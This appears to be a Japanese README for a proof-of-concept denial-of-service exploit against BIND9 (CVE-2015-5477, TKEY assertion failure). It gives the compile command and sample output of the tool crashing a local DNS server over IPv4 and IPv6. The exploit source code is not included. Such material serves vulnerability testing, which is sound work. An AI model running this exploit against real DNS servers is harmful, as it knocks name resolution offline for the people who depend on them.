
CVE-2015-5477 BIND9 TKEYアサーション失敗のPoCエクスプロイト
このエクスプロイトは、BIND9サーバーが脆弱かどうかをテストするために、実際にエクスプロイトを送信してクラッシュするかどうかを確認します。
Unix/Windowで通常の方法でコンパイルするCコードです。例:
# gcc tkill.c -o tkill
IPv4とIPv6の両方で動作します。
これは localhost に対して実行したときの様子です。名前を解決するとIPアドレスが2つ返るため、その両方を試行します。まず "version" 文字列を照会し、その後エクスプロイトを送信します。2つ目のアドレスを調査するときには、最初の試行でサービスがすでにクラッシュしているため、version クエリは失敗します。
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed